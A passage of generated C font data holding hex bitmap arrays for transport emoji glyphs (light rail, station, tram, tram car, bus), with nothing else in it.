0x86, 0x3f, 0xfc, 0xff, 0xf1, 0x83, 0x30, 0x10,
0xc3, 0x1f, 0xfe, 0x7f, 0xf8, 0xc1, 0x98, 0x8,
0x61, 0x8f, 0xff, 0x3f, 0xfc, 0x60, 0xcc, 0x4,
0x30, 0xc7, 0xff, 0xbf, 0xfe, 0x30, 0x66, 0x2,
0x18, 0x63, 0xff, 0xff, 0xff, 0x18, 0x33, 0x1,
0xc, 0x31, 0xff, 0xff, 0xff, 0x8c, 0x19, 0x80,
0x86, 0x18, 0xff, 0xff, 0xff, 0xc6, 0xc, 0xc0,
0x43, 0xc, 0x7f, 0xff, 0xff, 0xe3, 0x6, 0x60,
0x21, 0x86, 0x3f, 0xff, 0xff, 0xf1, 0x83, 0x30,
0x10, 0xc3, 0x1f, 0xff, 0xff, 0xf8, 0xff, 0x9f,
0xf8, 0x7f, 0x8f, 0xff, 0xff, 0xfc, 0x7f, 0xcf,
0xfc, 0x3f, 0xc7, 0xff, 0xff, 0xfe, 0x0, 0x7,
0xfe, 0x0, 0x3, 0xff, 0xff, 0xff, 0x0, 0x3,
0xff, 0x0, 0x1, 0xff, 0xff, 0xff, 0x83, 0x81,
0xff, 0x80, 0x60, 0xff, 0xff, 0xff, 0xc3, 0xc0,
0xff, 0xc0, 0x78, 0x7f, 0xfd, 0xff, 0xe1, 0xe0,
0x7f, 0xe0, 0x3c, 0x3f, 0xfc, 0xff, 0xf0, 0x70,
0x3f, 0xf0, 0xc, 0x1f, 0xfe, 0x7f, 0xf8, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0x3f, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0x8f, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0x87, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0xff, 0xe0,
0x0, 0xff, 0xe0, 0x0, 0xff, 0xe0, 0x7f, 0xf0,
0x0, 0x7f, 0xf0, 0x0, 0x7f, 0xe0, 0x1f, 0xf8,
0x0, 0x3f, 0xf8, 0x0, 0x3f, 0xf0, 0x7, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xf0, 0x3, 0xfe,
0x0, 0x0, 0x0, 0x0, 0xf, 0xf8, 0x0, 0xff,
0x80, 0x0, 0x0, 0x0, 0xf, 0xf8, 0x0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x7,
0xff, 0x3f, 0xff, 0xff, 0x9f, 0xfc, 0x0, 0x1,
0xff, 0x0, 0xff, 0xf8, 0x7, 0xfc, 0x0, 0x0,
0x7e, 0x0, 0xff, 0xfe, 0x0, 0xfc, 0x0, 0x0,
0xe, 0x0, 0xff, 0xff, 0x80, 0x38, 0x0, 0x0,
0x2, 0x0, 0xff, 0xff, 0xe0, 0x8, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xff, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F688 "🚈" */
0x0, 0x0, 0x0, 0x3, 0xf8, 0x0, 0x0, 0x0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xef, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x0, 0x0, 0x0, 0x3f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc0, 0x1, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xe0, 0x3, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf0, 0x3, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0x3, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x3, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x0, 0xe, 0x3, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x7, 0x1, 0xe0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x3, 0x81, 0xe0, 0x7f, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc1, 0xe0, 0x7f, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0xff, 0xff, 0x80, 0x3f,
0xff, 0xff, 0xff, 0xf0, 0x7f, 0xff, 0x80, 0x7f,
0xff, 0xff, 0xff, 0xf8, 0x70, 0x3, 0xc0, 0x79,
0xc0, 0x1, 0xc0, 0x1c, 0x38, 0x3, 0xc0, 0x70,
0xe0, 0x0, 0xe0, 0xe, 0x3c, 0x1, 0xc0, 0x70,
0x70, 0x0, 0x70, 0x7, 0x1c, 0x1, 0xe0, 0x70,
0x38, 0x0, 0x38, 0x3, 0x8e, 0x0, 0xe0, 0x38,
0x1c, 0x0, 0x1c, 0x1, 0xc7, 0x0, 0xf0, 0x38,
0xe, 0x0, 0xe, 0x0, 0xe7, 0x0, 0x70, 0x38,
0x7, 0x0, 0x7, 0x0, 0x73, 0x80, 0x78, 0x1c,
0x3, 0x80, 0x3, 0x80, 0x39, 0xc0, 0x38, 0x1c,
0x1, 0xc0, 0x1, 0xc0, 0x1c, 0xe0, 0x3c, 0xe,
0x0, 0xe0, 0x0, 0xe0, 0xe, 0x70, 0x1c, 0x7,
0x0, 0x70, 0x0, 0x70, 0x7, 0x38, 0x1e, 0x3,
0x80, 0x38, 0x0, 0x38, 0x3, 0xb8, 0x1e, 0x1,
0xff, 0xff, 0xff, 0xff, 0xff, 0xdc, 0x1f, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xee, 0x3f, 0x0,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xf7, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3b, 0xf7, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1d, 0xf3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0xf9, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x7f, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xbf, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xdf, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xef, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x73, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x39, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x87,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x73,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80,
/* U+1F689 "🚉" */
0x0, 0x0, 0x3f, 0xff, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1b, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x18, 0xc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x60, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xf8,
0x7, 0xff, 0x80, 0x0, 0x0, 0x0, 0xf, 0xff,
0xc0, 0x3f, 0xff, 0x0, 0x0, 0x0, 0x0, 0xff,
0xfe, 0x1, 0xff, 0xfc, 0x0, 0x0, 0x0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x0,
0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0,
0x7, 0xff, 0x80, 0x0, 0x1f, 0xfe, 0x3f, 0xfe,
0x1c, 0x3f, 0x0, 0x0, 0x0, 0x7, 0xf1, 0xff,
0xf0, 0xe0, 0xe0, 0x0, 0x0, 0x0, 0x7, 0xc,
0x1, 0xff, 0x7, 0x0, 0x0, 0x0, 0x0, 0x38,
0x60, 0xf, 0xf8, 0x38, 0x0, 0xff, 0xe0, 0x1,
0xc3, 0x0, 0x7f, 0xc1, 0xc0, 0xff, 0xff, 0xfc,
0xe, 0x18, 0x3, 0xe, 0xe, 0x1f, 0xff, 0xff,
0xf8, 0x70, 0xff, 0xf8, 0x70, 0x70, 0xfc, 0xc,
0xf, 0xc3, 0x87, 0xff, 0xc3, 0x83, 0x86, 0x0,
0x60, 0x6, 0x1c, 0x30, 0x6, 0x1c, 0x1c, 0x30,
0x3, 0x0, 0x30, 0xe1, 0x80, 0x3f, 0xe0, 0xe1,
0x80, 0x18, 0x1, 0x87, 0xc, 0x1, 0xff, 0x7,
0xc, 0x0, 0xc0, 0xc, 0x38, 0x60, 0xf, 0xf8,
0x38, 0x60, 0x6, 0x0, 0x61, 0xc3, 0xff, 0xe1,
0xc1, 0xc3, 0x0, 0x30, 0x3, 0xe, 0x1f, 0xff,
0xe, 0xe, 0x18, 0x1, 0x80, 0x18, 0x70, 0x0,
0x0, 0x70, 0x70, 0xc0, 0xc, 0x0, 0xc3, 0x80,
0x0, 0x3, 0x83, 0x86, 0x0, 0x60, 0x6, 0x1c,
0x0, 0x0, 0x1c, 0x1c, 0x3e, 0x73, 0x3c, 0xf0,
0xe0, 0x0, 0x0, 0xe0, 0xe1, 0xf7, 0x99, 0xef,
0x87, 0x0, 0x0, 0x7, 0x7, 0xf, 0xfc, 0xcf,
0xfc, 0x38, 0x0, 0x0, 0x38, 0x38, 0x7f, 0xf6,
0x7f, 0xe1, 0xc0, 0x0, 0x1, 0xc1, 0xc3, 0xff,
0xf7, 0xff, 0xe, 0x0, 0x0, 0xe, 0xe, 0x1f,
0xff, 0xff, 0xf8, 0x70, 0x0, 0x0, 0x70, 0x70,
0x0, 0x4f, 0xc0, 0x3, 0x80, 0x0, 0x3, 0x83,
0x80, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x1c,
0x1c, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0,
0xe0, 0xe0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x7, 0x7, 0x1, 0x0, 0x0, 0x20, 0x38, 0x0,
0x0, 0x38, 0x38, 0x1e, 0x0, 0x3, 0x81, 0xc0,
0x0, 0x1, 0xc1, 0xc1, 0xf0, 0x0, 0x3e, 0xe,
0x0, 0x0, 0xe, 0xe, 0xf, 0x80, 0x1, 0xf0,
0x70, 0x0, 0x0, 0x7f, 0xf0, 0x3c, 0x0, 0xf,
0x83, 0xff, 0xff, 0xff, 0xff, 0x81, 0xc0, 0x0,
0x38, 0x1f, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x0, 0xfe, 0x0, 0x0, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x3, 0xfc, 0x0, 0x7, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xf8, 0x0, 0x3f, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x73, 0xf0, 0x1, 0xff,
0x80, 0x0, 0x0, 0x0, 0x7, 0x87, 0xe0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0xf, 0xe0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x1f,
0xc3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x1f, 0x9f, 0xfe, 0xf9, 0xff, 0xfc, 0x7d, 0xff,
0x80, 0x3f, 0xff, 0xf7, 0xcf, 0xff, 0xf3, 0xef,
0xfe, 0x0, 0x7f, 0xff, 0xbe, 0x7f, 0xff, 0x9f,
0x3f, 0xfc, 0x0, 0xff, 0xf9, 0xf3, 0xff, 0xfc,
0xf9, 0xff, 0xf8, 0x1, 0xff, 0xcf, 0x9f, 0xff,
0xf7, 0xc7, 0xff, 0xe0, 0xf, 0xfe, 0x1, 0xff,
0xff, 0x80, 0x3f, 0xff, 0xc0, 0x7f, 0xe0, 0xf,
0xff, 0xfc, 0x0, 0xff, 0xff, 0x83, 0xff, 0x0,
0x7f, 0xff, 0xe0, 0x7, 0xff, 0xfe, 0x1f, 0xf8,
0x3, 0xff, 0xff, 0x80, 0x1f, 0xff, 0xfc, 0xff,
0xc0, 0x1f, 0xff, 0xfc, 0x0, 0xff, 0xff, 0xf7,
0xfc, 0x0, 0xff, 0xff, 0xe0, 0x3, 0xff, 0xff,
0xf8,
/* U+1F68A "🚊" */
0x0, 0x0, 0x0, 0xff, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x6, 0xc0, 0x68, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0x80, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x0,
0x0, 0xff, 0xf8, 0xf, 0xff, 0x80, 0x0, 0x0,
0x3, 0xff, 0xe0, 0xf, 0xff, 0x80, 0x0, 0x0,
0x1f, 0xff, 0xc0, 0x1f, 0xff, 0x80, 0x0, 0x0,
0x3f, 0xff, 0xc0, 0x7f, 0xff, 0x80, 0x0, 0x0,
0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x0, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x7,
0xff, 0xc0, 0x0, 0x3f, 0xff, 0x0, 0x0, 0xf,
0xe0, 0x0, 0x0, 0x0, 0xfe, 0x0, 0x0, 0xc,
0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x18,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x30,
0x0, 0x7f, 0xe0, 0x0, 0xe0, 0x0, 0x0, 0x61,
0xff, 0xff, 0xff, 0xe1, 0xc0, 0x0, 0x0, 0xc3,
0xff, 0xff, 0xff, 0xc3, 0x80, 0x0, 0x1, 0x87,
0x80, 0x10, 0x7, 0x87, 0x0, 0x0, 0x3, 0xe,
0x0, 0x20, 0x7, 0xe, 0x0, 0x0, 0x6, 0x1c,
0x0, 0x40, 0xe, 0x1c, 0x0, 0x0, 0xc, 0x38,
0x0, 0x80, 0x1c, 0x38, 0x0, 0x0, 0x18, 0x70,
0x1, 0x0, 0x38, 0x70, 0x0, 0x0, 0x30, 0xe0,
0x2, 0x0, 0x70, 0xe0, 0x0, 0x0, 0x61, 0xc0,
0x4, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0xc3, 0x80,
0x8, 0x1, 0xc3, 0x80, 0x0, 0x1, 0x87, 0x0,
0x10, 0x3, 0x87, 0x0, 0x0, 0x3, 0xe, 0x0,
0x20, 0x7, 0xe, 0x0, 0x0, 0x6, 0x1f, 0x9e,
0x4f, 0x3e, 0x1c, 0x0, 0x0, 0xc, 0x3f, 0xfc,
0x9f, 0xfc, 0x38, 0x0, 0x0, 0x18, 0x7f, 0xf9,
0x3f, 0xf8, 0x70, 0x0, 0x0, 0x30, 0xff, 0xf2,
0x7f, 0xf0, 0xe0, 0x0, 0x0, 0x61, 0xff, 0xff,
0xff, 0xe1, 0xc0, 0x0, 0x0, 0xc3, 0xff, 0xff,
0xff, 0x83, 0x80, 0x0, 0x1, 0x80, 0x3, 0xff,
0x80, 0x7, 0x0, 0x0, 0x3, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x0, 0x6, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x0, 0xc, 0x0, 0x0, 0x0,
0x0, 0x38, 0x0, 0x0, 0x18, 0x6, 0x0, 0x0,
0xc0, 0x70, 0x0, 0x0, 0x30, 0x3e, 0x0, 0x3,
0xc0, 0xe0, 0x0, 0x0, 0x60, 0x7e, 0x0, 0xf,
0x81, 0xc0, 0x0, 0x0, 0xc0, 0xfc, 0x0, 0x1f,
0x3, 0x80, 0x0, 0x1, 0x81, 0xf0, 0x0, 0x1e,
0x7, 0x0, 0x0, 0x3, 0x1, 0xc0, 0x0, 0x18,
0xe, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0, 0x0,
0xf0, 0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0x7f, 0xfc, 0x3f, 0xfe, 0x3f, 0xfe,
0x0, 0x1, 0xff, 0xf8, 0xff, 0xfc, 0x7f, 0xfe,
0x0, 0x7, 0xff, 0xf1, 0xff, 0xfc, 0xfd, 0xfe,
0x0, 0xf, 0xf7, 0xe3, 0xff, 0xf9, 0xfb, 0xfe,
0x0, 0x3f, 0xe0, 0x7, 0xff, 0xf0, 0x3, 0xfe,
0x0, 0xff, 0x80, 0x1f, 0xff, 0xe0, 0x7, 0xfe,
0x3, 0xff, 0x0, 0x3f, 0xff, 0xe0, 0x7, 0xfe,
0xf, 0xfc, 0x0, 0x7f, 0xff, 0xc0, 0xf, 0xfe,
0x3f, 0xf8, 0x1, 0xff, 0xff, 0x80, 0xf, 0xfc,
0xff, 0xf0, 0x3, 0xff, 0xff, 0x0, 0x1f, 0xfc,
/* U+1F68B "🚋" */
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0xc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x6, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1e, 0x7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x87, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xe7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x81, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xe1, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfe, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x1f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x8f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0xe0, 0x0, 0x7, 0xff,
0xff, 0x80, 0x0, 0x1c, 0x70, 0x0, 0x7, 0xff,
0xff, 0xe0, 0x0, 0xe, 0x38, 0x0, 0x3, 0x0,
0xc0, 0x18, 0x0, 0x7, 0x1c, 0x3f, 0xc1, 0x80,
0x60, 0xc, 0x1f, 0xc3, 0x8e, 0x1f, 0xe0, 0xc0,
0x30, 0x6, 0xf, 0xe1, 0xc7, 0xc, 0x30, 0x60,
0x18, 0x3, 0x6, 0x30, 0xe3, 0x86, 0x18, 0x30,
0xc, 0x1, 0x83, 0x18, 0x71, 0xc3, 0xc, 0x19,
0xe6, 0x3c, 0xc1, 0x8c, 0x38, 0xe1, 0x86, 0xc,
0xf3, 0x1e, 0x60, 0xc6, 0x1c, 0x70, 0xc3, 0x6,
0x79, 0x8f, 0x30, 0x63, 0xe, 0x38, 0x7f, 0x83,
0x3c, 0xc7, 0x98, 0x3f, 0x87, 0x1c, 0x0, 0x1,
0x9e, 0x63, 0xcc, 0x0, 0x3, 0x8e, 0x0, 0x0,
0xcf, 0x31, 0xe6, 0x0, 0x1, 0xc7, 0x0, 0x0,
0x67, 0x98, 0xf3, 0x0, 0x0, 0xe3, 0x80, 0x0,
0x30, 0xc, 0x1, 0x80, 0x0, 0x71, 0xc0, 0x0,
0x18, 0x6, 0x0, 0xc0, 0x0, 0x38, 0xe0, 0x0,
0xc, 0x3, 0x0, 0x60, 0x0, 0x1c, 0x70, 0x0,
0x6, 0x1, 0x80, 0x30, 0x0, 0xe, 0x38, 0x0,
0x3, 0x0, 0xc0, 0x18, 0x0, 0x7, 0x1c, 0x0,
0x1, 0x80, 0x60, 0xc, 0x0, 0x3, 0x8e, 0x0,
0x0, 0xc0, 0x30, 0x6, 0x0, 0x1, 0xc7, 0x0,
0x0, 0x60, 0x18, 0x3, 0x0, 0x0, 0xe3, 0x80,
0x0, 0x30, 0xc, 0x1, 0x80, 0x0, 0x71, 0xc0,
0x0, 0x18, 0x6, 0x0, 0xc0, 0x0, 0x39, 0xe0,
0x0, 0xc, 0x3, 0x0, 0x60, 0x0, 0x1e, 0xe0,
0x0, 0x6, 0x1, 0x80, 0x30, 0x0, 0x7, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x1c, 0x1c, 0x3f, 0xff, 0xfe, 0x1c, 0x18, 0x0,
0xe, 0x1c, 0x1f, 0xff, 0xfe, 0xe, 0x1c, 0x0,
0x3, 0x8e, 0x7, 0xff, 0xff, 0x3, 0x8c, 0x0,
0x1, 0xfe, 0x0, 0x0, 0x0, 0x1, 0xfe, 0x0,
0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0,
0x0,
/* U+1F68C "🚌" */
0x0, 0x0, 0x0, 0x7, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x3, 0xff, 0x81, 0xff,
0xff, 0xe0, 0x0, 0x0, 0x0, 0xf, 0xff, 0xe1,
0xff, 0xff, 0xf0, 0x0, 0x0, 0x0, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc3, 0xe0, 0x7, 0xff, 0x0,
0x0, 0xe0, 0x0, 0x7, 0xe3, 0xe0, 0x3, 0x83,
0x80, 0x0, 0x70, 0x0, 0x3, 0xf1, 0xf0, 0x1,
0xc1, 0xc0, 0x0, 0x38, 0x0, 0x1, 0xf8, 0xf0,
0x0, 0xe0, 0xe0, 0x0, 0x1c, 0x0, 0x0, 0xfc,
0x78, 0x0, 0x70, 0x70, 0x0, 0xe, 0x0, 0x0,
0x7e, 0x3c, 0x0, 0x38, 0x38, 0x0, 0x7, 0x0,
0x0, 0x3f, 0x3e, 0x0, 0x1c, 0x1c, 0x0, 0x3,
0x80, 0x0, 0x1f, 0x9f, 0x0, 0xe, 0xe, 0x0,
0x1, 0xc0, 0x0, 0xf, 0xcf, 0x80, 0x7, 0x7,
0x0, 0x0, 0xe0, 0x0, 0x7, 0xe7, 0xc0, 0x3,
0x83, 0x80, 0x0, 0x70, 0x0, 0x3, 0xf3, 0xc0,
0x1, 0xc1, 0xc0, 0x0, 0x38, 0x0, 0x1, 0xf9,
0xe0, 0x0, 0xe0, 0xe0, 0x0, 0x1c, 0x0, 0x0,
0xfc, 0xf0, 0x0, 0x70, 0x70, 0x0, 0xe, 0x0,
0x0, 0x7e, 0x78, 0x0, 0x38, 0x38, 0x0, 0x7,
0x0, 0x0, 0x3f, 0x3c, 0x0, 0x1c, 0x1c, 0x0,
0x3, 0x80, 0x0, 0x1f, 0x9f, 0x0, 0xe, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xcf, 0x80, 0x7,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe7, 0xff,
0xff, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0, 0x73,
0xff, 0xff, 0xc1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x39, 0x80, 0x0, 0xe0, 0xe0, 0x0, 0x0, 0x0,
0x1e, 0x1c, 0xe0, 0x0, 0x70, 0x70, 0x0, 0x0,
0x0, 0x0, 0xe, 0x7c, 0x0, 0x38, 0x38, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x6e, 0x0, 0x1c, 0x1c,
0x0, 0x0, 0x0, 0x3, 0xcf, 0xb3, 0x0, 0xe,
0xe, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf9, 0x80,
0x7, 0x7, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf8,
0xc0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x79,
0xfc, 0x60, 0x1, 0xc1, 0xc0, 0x0, 0x0, 0x0,
0x3c, 0xff, 0xf0, 0xf8, 0xff, 0xe0, 0x0, 0x0,
0x1f, 0x0, 0x7f, 0xf9, 0xff, 0x7f, 0xf0, 0x0,
0x0, 0x3f, 0xe0, 0xf, 0x81, 0xff, 0xff, 0xf8,
0x0, 0x0, 0x3f, 0xf8, 0x7, 0xc0, 0xf1, 0xff,
0xfc, 0x0, 0x0, 0x1e, 0x3c, 0x3, 0xf0, 0xf0,
